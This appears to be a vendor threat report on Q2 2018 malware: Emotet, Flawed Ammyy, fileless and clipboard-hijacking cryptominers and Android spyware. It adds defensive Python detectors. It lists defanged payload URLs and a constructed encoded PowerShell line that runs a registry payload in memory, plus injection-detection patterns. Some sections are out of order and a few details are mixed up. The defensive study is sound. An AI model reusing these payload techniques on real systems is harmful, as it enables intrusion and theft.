Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals are increasingly hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their strategy, policies and posture.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine-learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
2.2 PowerShell-based attack with Emotet

Another alarming trend concerns the malware itself rather than its delivery method. Cybercriminals often build malware not on native Windows .exe files but on PowerShell scripts and other legitimate software. This type of attack is much harder for antivirus tools to detect.

Emotet is one of the most aggressive trojans currently active. Spread through various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire the user's trust.

The phishing email
The attached file is an Office document containing a macro (a VBA script). Because a default Microsoft Office installation does not allow such scripts to run, the attackers added a lure, a "special option", to convince the victim to enable them.

The special option to convince the victims to turn on script execution
The purpose of the macro is to launch PowerShell.
The PowerShell script downloads the payload to a temporary folder and executes it. The binary is fetched from one of the following URLs (defanged with "hxxp"):

hxxp://www.iyilikleralemi.com/GtXvlc
hxxp://www.thecyberconxion.com/PUqUUe
hxxp://EliasWessel.com/vu6xGmS
hxxp://mossbeachmusic.de/XuBBN6r
hxxp://airmaxx.rs/wIdY

At the time of writing, only the thecyberconxion.com host was still serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary copies itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence. A newly registered service whose executable sits in a system directory but belongs to no installed product is a cheap indicator to hunt for across a fleet.

The malware creates the "lanesviewer" service to ensure persistence
After that, Emotet begins its real mission: stealing private data from the compromised system and sending it to the cybercriminals' command-and-control server.

The next example is even more cunning, because it infects computers through popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and varied history of use in cyberattacks. What is most striking is that it is based on a legitimate program, Ammyy Admin. Its history is a textbook example of how malicious hackers turn a legitimate tool into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals, and unsurprisingly they adopted it for their own activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin installer with a bundle containing malware, so that every user who downloaded Ammyy Admin was covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle repeated itself over and over.
As the diagram shows, Ammyy Admin was used to spread many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016, and it takes its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy gives the attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noting is that this trick, too, relies on legitimate software, this time from Microsoft.
Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are Excel Web Query files: a plain-text format that tells Microsoft Excel to fetch data from a URL, so an IQY contains a URL plus a few related parameters. Excel retrieves whatever the URL returns and imports it into the worksheet. Because the file itself carries only a URL, filters that look for macros or executables see nothing suspicious, and the malicious content lives on the attacker's server, where it can be changed at any time.

The malicious IQY pointed at an attacker-controlled URL, which starts a chain of malicious files that ends with downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
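The following Python is an added example, not part of the report. Because an IQY attachment contains nothing but a URL and a few parameters, the only thing a gateway can judge statically is where that URL points; the parser below reads the format (line 1 "WEB", line 2 a version, line 3 the URL, then key=value parameters) and vets the URL against an assumed corporate allowlist. Both sample files and the allowlist are constructed for the demonstration (203.0.113.0/24 is a documentation-only address range).

```python
"""Parse and vet an Excel Web Query (.iqy) attachment.  The file is plain text:
line 1 "WEB", line 2 a version number, line 3 the URL Excel will fetch, then
optional key=value parameters.  It holds no code of its own, so the only
thing to judge is where the URL points.  Added example; the allowlist and both
sample files are constructed (203.0.113.0/24 is a documentation-only range)."""
import ipaddress
import re
from urllib.parse import urlparse

# Assumed corporate allowlist of hosts Excel may query from an attachment.
ALLOWED_HOSTS = {"intranet.example.corp", "reports.example.corp"}

SAMPLE_MALICIOUS_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://203.0.113.7/1.dat\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
    "PreFormattedTextToColumns=True\r\n"
)
SAMPLE_BENIGN_IQY = (
    "WEB\n"
    "1\n"
    "https://reports.example.corp/sales/q2.html\n"
    "\n"
    "Selection=1\n"
    "Formatting=All\n"
)


def parse_iqy(text: str) -> dict:
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return {"version": lines[1].strip(), "url": lines[2].strip(), "params": params}


def assess_iqy(text: str) -> dict:
    query = parse_iqy(text)
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {url.scheme!r}")
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} is not on the allowlist")
    try:
        ipaddress.ip_address(host)
        reasons.append("URL uses a raw IP address instead of a hostname")
    except ValueError:
        pass
    if url.scheme == "http":
        reasons.append("cleartext HTTP: the response can be swapped on the wire")
    if re.search(r"\.(dat|ps1|hta|exe)$", url.path, re.I):
        reasons.append(f"suspicious path extension in {url.path!r}")
    return {"url": query["url"], "verdict": "block" if reasons else "allow", "reasons": reasons}


if __name__ == "__main__":
    for label, iqy in (("malicious", SAMPLE_MALICIOUS_IQY), ("benign", SAMPLE_BENIGN_IQY)):
        print(label, assess_iqy(iqy))
```

The decision rests on the allowlist: a file that passes every other check but points outside the corporate hosts is still blocked, because the real payload is whatever the server chooses to return when Excel fetches it, and the server can serve harmless text to a scanner and the malicious content to the victim. Most organizations that do not use web queries at all simply block the .iqy extension at the gateway rather than vetting URLs.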
Thus, in this case, machines face extremely dangerous and potent malware that is created and delivered via legitimate software, which makes it much harder for antivirus software to detect the attack.
2.4 The growth of Flawed Ammyy attacks for Q2

Figure: the growth of Flawed Ammyy attacks for Q2 2018 (Comodo detections per month, recovered from the chart data)

Month        Detections
April 2018       43,188
May 2018         46,382
June 2018        48,881

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably entail a shift of attack vectors toward covert theft and the manipulation of users: a real gift for cybercriminals and a nightmare for users.

Trojans let attackers gain time. Because the malware acts covertly, the cybercriminals have more than enough time to use the stolen data to their advantage; in many cases the attack is discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The combination of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a surge of such attacks and victims. And using legitimate tools like PowerShell to run malware will amplify the number of victims even further, because such attacks are much harder for antivirus products to detect.

To fight these attacks, security departments need to rearrange their approach in line with the trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles provides the most promising solution.
3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has diminished. On the contrary, current cryptominer behavior recalls an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.

Earlier cryptominers could only use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: they did not steal information or destroy data like other malware, they merely consumed CPU cycles. Moreover, they typically did not employ strong obfuscation and could easily be discovered and deleted.

But the events of Q2 clearly showed that the situation has changed radically.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mining alone requires. They show that cryptominers are turning into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight anti-malware tools: they can camouflage themselves, kill competing cryptominers and even crash the user's system if an attempt is made to delete them.

3.1 BadShell attacks enterprises

Fileless malware is a step beyond traditional infection via .exe files. File-based malware resides on the disk, which makes it easier to detect. Fileless malware is different: as the name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim's disk and functions only in memory, which makes it much harder for antivirus products to detect.

Such malware is usually spread via malicious ad banners. Clicking a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of the infection. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced exactly such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts found that the malware was a cryptominer that used legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

Decoding the PowerShell arguments reveals the malicious code stored in the registry; the PowerShell script reads it from there and injects it into an existing running process. Nothing ever touches the disk as a file, so the scheduled task and the PowerShell command line (typically an encoded command) are the artifacts a responder has to look for.

BadShell at work
The malicious code in the registry
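The persistence chain just described (a scheduled task launching PowerShell, which pulls an encoded payload out of the registry and runs it in memory) leaves traces a defender can triage from the task's command line. The following Python is an added example, not code from the report or from BadShell itself; the registry path, value name and script are constructed placeholders, and the indicator list is an assumption about what such a task typically looks like.

```python
"""Triage PowerShell command lines for BadShell-style fileless miners.

Added example (not from the Comodo report): given the command line that a
scheduled task launches, decode an -EncodedCommand payload and flag the traits
described in the text: a hidden window, a payload read from the registry,
base64 unpacking, and in-memory execution or process injection.
"""
import base64
import re

# Indicator patterns, matched case-insensitively against the decoded script
# (or against the raw command line when nothing is encoded).
INDICATORS = {
    "registry_read": r"Get-ItemProperty|HKCU:|HKLM:|Registry::",
    "base64_decode": r"FromBase64String",
    "in_memory_exec": r"\bIEX\b|Invoke-Expression",
    "injection_api": r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread",
}


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (or its short forms), else None.

    PowerShell expects base64 over the UTF-16LE encoding of the script.
    """
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Score one command line; returns the decoded script, indicator hits and a score."""
    hits = {"hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I))}
    script = decode_encoded_command(cmdline)
    hits["encoded"] = script is not None
    body = script if script is not None else cmdline
    for name, pattern in INDICATORS.items():
        hits[name] = bool(re.search(pattern, body, re.I))
    return {"script": script, "indicators": hits, "score": sum(hits.values())}


def encode_command(script):
    """Build the base64(UTF-16LE) form that -EncodedCommand takes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample, not a real BadShell artefact: the task reads a base64
# blob from a placeholder registry value and runs it in memory.
PAYLOAD_SCRIPT = (
    "$v = (Get-ItemProperty -Path 'HKCU:\\Software\\PLACEHOLDER').Payload;"
    "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($v)))"
)
SUSPICIOUS_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -EncodedCommand " + encode_command(PAYLOAD_SCRIPT)
)
BENIGN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for label, cmd in (("suspicious", SUSPICIOUS_CMDLINE), ("benign", BENIGN_CMDLINE)):
        result = triage(cmd)
        print(label, "score", result["score"],
              [k for k, v in result["indicators"].items() if v])
```

Fed with the command lines of every scheduled task on a host, the score separates the fileless-miner pattern from ordinary administrative PowerShell tasks.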
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus software and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes unremovable. Attempting to kill it kills the target system as well.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes carry the system attribute CriticalProcess, meaning that terminating either of them will crash the system and leave the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only the victim's system but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out among other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner takes undivided possession of the victim's computer and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any sign of a cryptominer. So she concludes that something has gone wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
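A page-level check for the camouflage just described: decode base64 literals passed to atob(), then look in every decoded layer for iframes that are one pixel in size or point at the cnhv.co shortener, alongside plain includes of the CoinHive script. This Python is an added example, not code from the report; the shortlink path and the sample pages are constructed placeholders.

```python
"""Detect CoinHive hidden behind base64 and a 1x1 iframe to a URL shortener.

Added example, not code from the report: decodes base64 literals handed to
atob() (the document.write trick described above), then inspects every layer
for tiny iframes, iframes pointing at the cnhv.co shortener, and direct
includes of the CoinHive script.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SHORTENER_DOMAINS = {"cnhv.co"}  # CoinHive's shortlink domain, as shown in the text
MINER_SCRIPT_MARKERS = ("coinhive.min.js", "coinhive.com/lib")


class TagCollector(HTMLParser):
    """Collect iframe attributes and external script sources from one HTML layer."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script" and attrs.get("src"):
            self.scripts.append(attrs["src"])


def decode_atob_literals(html):
    """Yield the decoded text of each base64 literal passed to atob()."""
    for m in re.finditer(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", html):
        try:
            yield base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue


def is_tiny(attrs):
    """True when both width and height are 1 pixel or less."""
    def dim(name):
        try:
            return int(str(attrs.get(name) or "").rstrip("px"))
        except ValueError:
            return None
    w, h = dim("width"), dim("height")
    return w is not None and h is not None and w <= 1 and h <= 1


def find_hidden_miner(html, max_depth=3):
    """Return (kind, url) findings across the page and its decoded layers."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):  # peel nested base64 layers
        frontier = [d for layer in frontier for d in decode_atob_literals(layer)]
        if not frontier:
            break
        layers.extend(frontier)
    findings = []
    for layer in layers:
        parser = TagCollector()
        parser.feed(layer)
        for src in parser.scripts:
            if any(marker in src for marker in MINER_SCRIPT_MARKERS):
                findings.append(("miner_script", src))
        for attrs in parser.iframes:
            src = attrs.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host in SHORTENER_DOMAINS or is_tiny(attrs):
                findings.append(("hidden_iframe", src))
    return findings


# Constructed sample pages; the shortlink path is a placeholder, not a real one.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
OBFUSCATED_PAGE = (
    "<html><body><p>Welcome</p><script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode("ascii")
    + "'))</script></body></html>"
)
PLAIN_PAGE = '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script></head></html>'
CLEAN_PAGE = '<html><body><iframe src="https://example.com/widget" width="300" height="200"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in (("obfuscated", OBFUSCATED_PAGE), ("plain", PLAIN_PAGE), ("clean", CLEAN_PAGE)):
        print(name, find_hidden_miner(page))
```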
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as an opening they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
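A defensive counterpart to the substitution shown above, as an added example that is not part of the report: a paste guard that remembers the address the user copied and blocks a paste whose clipboard content is a different wallet-looking string. The two addresses are the ones quoted above; the address-shape patterns are an assumption (Bitcoin formats only), and clipboard events are simulated with plain function calls.

```python
"""Clipboard paste guard against wallet-address substitution.

Added example, not from the Comodo report: the guard records what the user
deliberately copied and, at paste time, refuses a wallet-looking string that
is not the one that was copied. A real deployment would hook the OS
clipboard; here copy and paste are simulated with method calls.
"""
import re

# Assumption: Bitcoin-style address shapes (the family in the report's example).
ADDRESS_PATTERNS = {
    "btc_p2pkh": re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_p2sh": re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
}


def classify(text):
    """Return the address kind the text matches, or None if it is not an address."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


class ClipboardGuard:
    """Track the last deliberate copy and judge each paste against it."""

    def __init__(self):
        self.last_copied = None

    def on_copy(self, text):
        """Record what the user placed on the clipboard."""
        self.last_copied = text.strip()

    def on_paste(self, clipboard_text):
        """Return (verdict, reason) for the text about to be pasted."""
        text = clipboard_text.strip()
        kind = classify(text)
        if kind is None:
            return ("allow", "not a wallet address")
        if text == self.last_copied:
            return ("allow", f"{kind} address matches what was copied")
        if classify(self.last_copied or "") is not None:
            # The user copied an address, but a different address is on the
            # clipboard now: exactly the hijacker behaviour described above.
            return ("block", f"{kind} address differs from the copied one; clipboard was rewritten")
        return ("warn", f"{kind} address on clipboard but no matching copy was seen")


# The two addresses quoted in the report's example.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SUBSTITUTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    guard = ClipboardGuard()
    guard.on_copy(COPIED)
    print(guard.on_paste(COPIED))       # allowed: unchanged
    print(guard.on_paste(SUBSTITUTED))  # blocked: rewritten by a hijacker
```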
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions.
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying capabilities. It steals account details and contacts (ID, name, phone numbers), as well as the owner's email address. It grabs SMS messages and associated information. It attempts to read call logs (number, name, type, duration), emails (email type) and contact photos. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.
KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions.
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in the spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend it brings a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message database and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: Facebook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware feature set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - get contact details and email ID
Mute - set action to mute
Mms - get MMS content
info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
